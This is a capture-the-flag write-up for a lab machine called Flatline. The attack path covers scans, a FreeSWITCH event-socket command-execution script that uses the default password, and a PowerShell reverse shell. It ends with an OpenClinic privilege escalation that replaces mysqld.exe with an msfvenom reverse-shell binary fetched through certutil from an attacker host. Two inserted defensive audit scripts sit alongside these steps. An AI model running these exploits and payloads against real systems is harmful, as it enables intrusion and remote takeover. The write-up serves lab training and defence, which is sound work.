Flatline

User Flag

nmap:

```console
nmap -sT -Pn -v10 -p- -oA nmap/tcp_full 10.10.34.94
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack
8021/tcp open  ftp-proxy     syn-ack
```
```console
nmap -Pn -O -sC -sV -p3389,8021 -oA nmap/vuln 10.10.34.94
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-25T20:52:06+00:00
|_ssl-date: 2022-02-25T20:52:08+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Since we have no username or password, we will first look at the FreeSWITCH service running on port 8021.

I tried connecting to the FTP service, but I saw an HTTP header instead:

```console
ftp 10.10.34.94 8021
Connected to 10.10.34.94.
Content-Type: auth/request
ftp> ls
Not connected.
ftp>
```

The Metasploit framework has an exploit for FreeSWITCH.

```console
┌──(root㉿kali)-[~]
└─# searchsploit FreeSWITCH
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                       |  Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)                                                             | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                                                                | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

But it does not work.

```console
msf6 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set RHOSTS 10.10.34.94
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set LHOST 10.9.1.150
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > exploit
[*] Started reverse TCP double handler on 10.17.8.104:4444
[*] 10.10.76.179:8021 - Login success
[*] 10.10.76.179:8021 - Sending payload (283 bytes) ...
[*] Exploit completed, but no session was created.
```

The Python script in /usr/share/exploitdb/exploits/windows/remote/47799.txt does work, though.

```console
searchsploit -x 47799.txt
```

```python
#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
```

The script opens a socket to port 8021 and authenticates with the default password ClueCon; the event socket then runs whatever `api system` command it is handed.
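As an added, defender-side example (not part of the writeup, and not FreeSWITCH's own tooling), here is a small audit of the conditions that script depends on: it parses a FreeSWITCH event_socket.conf.xml and flags the default ClueCon password, a listener bound beyond loopback, and a missing apply-inbound-acl. The XML sample is constructed; the parameter names are FreeSWITCH's own.

```python
import xml.etree.ElementTree as ET

DEFAULT_PASSWORD = "ClueCon"          # the password the exploit above relies on
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample: FreeSWITCH's stock event_socket.conf.xml parameters,
# with the listener opened to all interfaces (the stock file ships
# apply-inbound-acl commented out, so no ACL applies).
SAMPLE_CONF = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
  </settings>
</configuration>"""


def esl_params(xml_text: str) -> dict:
    """Collect <param name=... value=.../> pairs from the ESL config."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value") for p in root.iter("param")}


def audit_esl_config(xml_text: str) -> list:
    """Return human-readable findings; an empty list means nothing obvious."""
    params = esl_params(xml_text)
    findings = []
    password = params.get("password")
    if not password or password == DEFAULT_PASSWORD:
        findings.append("ESL password is missing or the default 'ClueCon'")
    listen_ip = params.get("listen-ip", "127.0.0.1")
    if listen_ip not in LOOPBACK:
        findings.append(f"ESL listener bound to non-loopback address {listen_ip} "
                        f"on port {params.get('listen-port', '8021')}")
    if not params.get("apply-inbound-acl"):
        findings.append("no apply-inbound-acl: any client that reaches the port may try to auth")
    return findings


if __name__ == "__main__":
    for finding in audit_esl_config(SAMPLE_CONF):
        print("FINDING:", finding)
```

Run it against the real file under the FreeSWITCH conf/autoload_configs directory; a listener that stays on loopback with a changed password and an ACL produces no findings.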

I exploited the vulnerability in four steps:

```console
1. nc 10.10.34.94 8021
2. auth ClueCon
3. nc -nvlp 1234
4. api system "powershell -e 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"
```

```powershell
PS C:\Users\Nekrotic\Desktop> more user.txt
THM{---}
```

There is a root.txt in the same folder, but we cannot read it :(

Root Flag

While looking around the machine, I came across the openclinic folder.

```powershell
PS C:\projects\openclinic> dir


    Directory: C:\projects\openclinic


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       09/11/2021     07:29                jdk1.8
d-----       09/11/2021     07:19                mariadb
d-----       09/11/2021     07:30                tomcat8
d-----       09/11/2021     07:29                Uninstall
-a----       06/04/2021     23:14            250 configureCountry.bat
-a----       01/07/2021     18:20            167 configureLanguage.bat
-a----       09/11/2021     07:18         334840 lua5.1.dll
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat
-a----       09/11/2021     07:18        1389568 uninstall.exe
```

```console
searchsploit openclinic
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                | windows/local/50448.txt
------------------------------------------------------------------- --------------------------------
```

We can escalate our privileges with this entry.

The exploit's description:

```console
kali@kali:~$ searchsploit -x 50448.txt
```

An unprivileged user can rename mysqld.exe or Tomcat8.exe. We can replace these files to escalate privileges. Since we are an unprivileged user we will not be able to restart the service, but once we reboot the machine we will get a connection as the NT AUTHORITY user.
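As an added example (not from the writeup or from the exploit-db entry), the following checks the precondition this escalation rests on from the defender's side: it parses `icacls` output for a service binary and reports allow ACEs that let low-privileged principals overwrite, rename or delete it. The icacls sample is constructed, not captured from the box.

```python
import re

# Principals that any interactive or authenticated user belongs to.
LOW_PRIV = r"(everyone|builtin\\users|nt authority\\authenticated users|nt authority\\interactive)"
ACE_RE = re.compile(LOW_PRIV + r":((?:\([^)]*\))+)\s*$", re.IGNORECASE)

# icacls simple rights that let a file be overwritten, renamed or deleted ...
DANGEROUS_SIMPLE = {"F", "M", "W", "D"}
# ... and the specific rights that amount to the same thing.
DANGEROUS_SPECIFIC = {"WD", "AD", "DE", "DC", "WDAC", "WO", "GW", "GA"}

# Constructed sample in the layout `icacls <file>` prints (first ACE on the
# path line, the rest indented); not captured from the box.
SAMPLE_ICACLS = """C:\\projects\\openclinic\\mariadb\\bin\\mysqld.exe BUILTIN\\Users:(I)(F)
                                              NT AUTHORITY\\SYSTEM:(I)(F)
                                              BUILTIN\\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files"""


def weak_aces(icacls_text: str) -> list:
    """Return (principal, rights) for every allow ACE that lets a low-privileged
    principal replace the file; an empty list is the expected state for a
    binary that a service runs as SYSTEM."""
    hits = []
    for line in icacls_text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        who, rights = m.group(1), m.group(2)
        if "(DENY)" in rights.upper():      # deny ACEs take access away, not grant it
            continue
        # "(I)(OI)(CI)(RX,W)" -> {"I", "OI", "CI", "RX", "W"}
        granted = {r.strip().upper() for grp in re.findall(r"\(([^)]*)\)", rights)
                   for r in grp.split(",")}
        if granted & (DANGEROUS_SIMPLE | DANGEROUS_SPECIFIC):
            hits.append((who, rights))
    return hits


if __name__ == "__main__":
    for who, rights in weak_aces(SAMPLE_ICACLS):
        print(f"replaceable by {who}: {rights}")
```

Feed it `icacls` output for every binary referenced by a service's ImagePath; a hit means a reboot or service restart will execute whatever a local user put in that path.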

I generated a Windows reverse shell with msfvenom and started listening on the port with nc.

```console
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.1.150 LPORT=3131 -f exe > mysqld_evil.exe
nc -nvlp 3131
```

I started a web server.

```console
python3 -m http.server 80
```

I renamed the mysqld.exe program to a backup file.

```powershell
PS C:\> cd C:\projects\openclinic\mariadb\bin
PS C:\projects\openclinic\mariadb\bin> Move-Item mysqld.exe mysqld.bak
```

Then I transferred the file I had created to the machine.

```powershell
PS C:\projects\openclinic\mariadb\bin> certutil.exe -urlcache -split -f http://10.9.1.150:80/mysqld_evil.exe mysqld.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.
```

I will restart the machine.

```powershell
PS C:\projects\openclinic\mariadb\bin> Restart-Computer
```

After waiting a while, the reverse shell connects back.

fsoc

This post is licensed under CC BY 4.0 by the author.